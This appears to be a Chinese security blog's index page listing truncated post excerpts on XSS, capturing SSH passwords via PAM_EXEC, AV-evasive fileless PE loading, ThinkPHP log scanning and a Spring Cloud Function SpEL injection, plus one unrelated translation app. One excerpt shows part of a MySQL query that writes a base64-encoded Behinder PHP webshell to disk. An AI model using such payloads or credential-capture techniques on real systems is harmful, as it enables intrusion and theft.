一处图片引用功能导致的XSS
山重水复疑无路 漏洞点:站点产品评论处 初步测试 一开始尝试XSS,发现程序有过滤,提交均显示Tags are not permitted,最后测出来的是过滤 < ,不过滤 > 因为提示速度比较快,猜测前端有一...
PAM_EXEC 不用第三方应用和重启抓取ssh密码
前言 从老外那新学一招:https://www.youtube.com/watch?v=FQGu9jarCWY 开始 先说优点,系统自带不安装第三方应用,不用重启,和 strace 方法相比不会生成过大的文件,能自动清理自身不留痕迹,...
BC实战|从Xss到主机上线
故事的起因 前几天收到一封邮件,内容是这样的: 你说发谁哪里不好,发到我这里来,正好最近辞职了没事干,搞下看看。 加上那个人的好友以后,象征性的聊了几句,大概就是:我说自己因为网赌没...
mysql写冰蝎马
select '<?php file_put_contents('abab.php',base64_decode('Jmx0Oz9waHANCkBlcnJvcl9yZXBvcnRpbmcoMCk7DQpzZXNzaW9uX3N0YXJ0KCk7DQogICAgJGtleT0iZTQ1ZTMyOWZlYjVkOTI1YiI7IA0KCSRfU0VTU0l...
免杀技术 – FilelessPELoader 免杀加载
FilelessPELoader 免杀加载 分享一个好用的 PE 远程加载项目 https://github.com/TheD1rkMtr/FilelessPELoader 远程内存加载,免杀大部分的杀软 1、首先安装相关 python 库 pip install pycrypt...
RTranslator 可离线使用的实时翻译、同声传译软件!免费开源
RTranslator 是一款适用于 Android 的(几乎) 开源、免费、离线实时翻译应用程序。 连接到拥有该应用程序的人,连接蓝牙耳机,将手机放在口袋中,您就可以像对方说您的语言一样进行对话。支持...
TPLogScan:ThinkPHP3和5日志扫描工具
ThinkPHP3和5日志扫描工具,提供命令行版和BurpSuite插件版,尽可能全的发掘网站日志信息 命令行版 安装 git clone https://github.com/r3change/TPLogScan.git cd TPLogScan/ pip install -r r...
漏洞复现 – Spring Cloud Function SpEL 表达式注入
漏洞描述 Spring Cloud Function 是基于 Spring Boot 的函数计算框架(FaaS),当其启用动态路由 functionRouter 时, HTTP 请求头 spring.cloud.function.routing-expression 参数存在 SPEL 表...
